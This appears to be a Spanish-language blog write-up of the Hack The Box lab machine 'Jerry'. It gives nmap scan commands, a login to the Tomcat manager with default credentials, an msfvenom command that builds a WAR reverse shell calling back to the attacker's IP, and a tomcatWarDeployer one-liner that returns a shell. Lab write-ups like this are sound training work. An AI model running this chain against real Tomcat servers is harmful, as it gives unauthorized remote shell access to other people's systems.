Buscar

12 julio 2021

Máquina Jerry HTB

Hoy os dejo la resolución de una de las máquinas de HTB de nivel fácil. Es cortita, así que si estás preparado, levanta tu Kali (Parrot, o la que uses) y vamos a ello.

Sigue leyendo para enterarte de todo.

Comenzamos revisando todos los puertos con nmap:


nmap -p- -sS --min-rate 5000 -n -vvv -Pn 10.10.10.95 -oG allPorts


Y ahora lanzamos otro para ver los servicios:


nmap -sC -sV -p8080 10.10.10.95 -oN targeted



Como no hay más que un puerto, veamos ese TomCat:



Comprobamos que si está visible el panel de login:



Lo primero es probar las credenciales por defecto:

tomcat : s3cret



Ya estamos dentro, ha sido fácil. Vamos a intentar subir una webshell, y para ello, lo hacemos así:

msfvenom -p java/jsp_shell_reverse_tcp LHOST= 10.10.14.43 LPORT= 443 -f war > shell.war

Una vez creada, la subimos a la web y nos ponemos a la escucha con netcat por el puerto que hemos establecido (443):



Nos crea “un apartado nuevo” y le damos para que se establezca la conexión:



Una vez que hemos accedido a la máqina, entramos y sacamos a la vez las flags de root y del usuario:


La verdad que esta máquina es muy muy sencilla, pero hay que hacerla. No nos volvamos locos con las más difíciles si no somos capaces de hacer estas primero.

Un extra:

Descargamos: https://github.com/mgeeky/tomcatWarDeployer

Lo clonamos, entramos en el directorio e instalamos los requisitos:

pip install -r requirements.txt

Y lo lanzamos:

python tomcatWarDeployer.py -U tomcat -P s3cret -p 4646 -H 10.10.14.43 10.10.10.95:8080 -x



Directamente nos devuelve una shell y ya podríamos sacar de la misma forma las flgs.

Nos vemos en la siguiente.

0 comentarios:

Publicar un comentario